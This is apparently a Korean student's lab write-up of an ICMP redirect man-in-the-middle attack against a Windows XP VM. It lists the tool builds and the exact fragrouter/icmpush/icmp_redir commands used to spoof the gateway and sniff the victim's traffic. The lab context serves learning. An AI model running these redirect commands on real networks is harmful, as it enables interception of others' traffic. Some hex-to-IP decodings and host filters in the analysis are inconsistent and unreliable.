[Network] ICMP redirect 실습

1. 구성과 계획
• 네트워크 구성도
공격자 att6 - 192.168.10.149/00:0C:29:4F:41:6E
피해자 winXP - 192.168.10.147/00-0C-29-59-88-56


• 과정 정리
Step 1. 환경구성
• 공격자 att6 fragrouter, icmpush
• 피해자 winxp 방화벽 해제
Step 2. fragrouter 실행 및 공격자가 피해자로 ICMP 리다이렉트(네이버) 전송
Step 3. 패킷 캡처
Step 4. 피해자 네이버로 ping
Step 5. 패킷 해석


2. 관련내용정리
ICMP redirect를 이용하여 라우터인척 스니핑을 할 수 있다.
3. 실습과정
Step 1. 환경구성
• 공격자 att6 fragrouter, icmpush, icmp_redir
tar xvfz fragrouter-1.6.tar.gz
cd fragrouter-1.6
./configure
make
make install


yum  install -y icmpush


gcc -o icmp_redir icmp_redir.c


• 피해자 winxp 방화벽 해제
Step 2. fragrouter 실행 및 공격자가 피해자로 ICMP 리다이렉트(네이버) 전송
fragrouter -B1
icmpush -red -c host -gw 192.168.10.149 -sp 192.168.10.1 -dest 23.35.221.113 192.168.10.147
./icmp_redir 192.168.10.1 192.168.10.147 23.35.221.113 192.168.10.149
Step 3. 패킷 캡처
wireshark on
와이어샤크로는 icmp가 차단되어 보이지 않아 tcp를 이용하여 공격자 패킷을 캡쳐했다.
tcpdump -xX -i eth0 host 192.168.10.148 > dump
Step 4. 피해자 네이버로 ping
ping www.naver.com
Step 5. arp 테이블 확인 및 패킷 해석
route PRINT

라우팅 테이블을 보면 23.35.221.113 으로 가는 패킷은 192.168.10.149로 가도록 설정하였다.
icmp redirect



192.168.10.1이 보내는것처럼 조작된 패킷이 피해자인 192.168.10.147에게 ICMP redirect를 보내 1723 dd71(23.35.221.113)인 네이버에 접속할때는 c0a8 0a95(192.168.10.149)으로 가라고 보낸것이다.


arp echo request, reply



ip의 헤더는 변경이 없다. 하지만 맥주소가 바뀐다.
request
C0a8 0a95(192.168.10.147) -> c0a8 0a93(192.168.10.149)
Winxp(192.168.10.147) -> att6(192.168.10.149/00:0C:29:4F:41:6E)
// 라우팅이 att6으로 되어있기 때문에 att6으로 날아간다.
reply
c0a8 0a93(192.168.10.149) -> C0a8 0a95(192.168.10.147)
att6(192.168.10.149/00:0C:29:4F:41:6E) -> Winxp(192.168.10.147/00-0C-29-59-88-56)
// 네이버에서 응답이 온게 아니라 149번을 통해서 응답이 온다.


icmp



request
b81c 99a1(184.28.153.161) -> c0a8 0a93(192.168.10.149)
reply
c0a8 0a93(192.168.10.149) -> b81c 99a1(184.28.153.161)